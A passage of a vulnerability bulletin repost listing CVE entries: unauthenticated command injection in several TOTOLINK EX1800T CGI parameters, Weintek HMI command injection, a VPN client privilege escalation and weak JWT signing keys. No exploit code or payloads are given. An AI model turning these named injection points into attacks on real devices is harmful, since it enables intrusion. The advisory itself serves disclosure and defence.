totolink — ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51024
[email protected]
totolink — ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51025
[email protected]
totolink — ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51026
[email protected]
totolink — ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51027
[email protected]
totolink — ex1800tTOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51028
[email protected]
weintek — cmt2078x_easywebAn authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter.2023-12-19not yet calculatedCVE-2023-50466
[email protected]
windows — multiple_productsAn issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file.2023-12-19not yet calculatedCVE-2023-47267
[email protected]
xpand_it — write-back_managerXpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack.2023-12-20not yet calculatedCVE-2023-27172
[email protected]

Back to top

A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

Buy Me A Coffee
Patreon

To keep up to date follow us on the below channels.

Tags: ,

You may have missed

HIBP Banner 1

Tappware – 94,734 breached accounts

May 9, 2024
Sliver C2

Sliver C2 Detected – 172[.]245[.]19[.]146:31337

May 9, 2024
Sliver C2

Sliver C2 Detected – 38[.]207[.]149[.]95:31337

May 9, 2024
CISA Logo

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog

May 9, 2024
CISA Logo

CISA: CISA Releases Eight Industrial Control Systems Advisories

May 9, 2024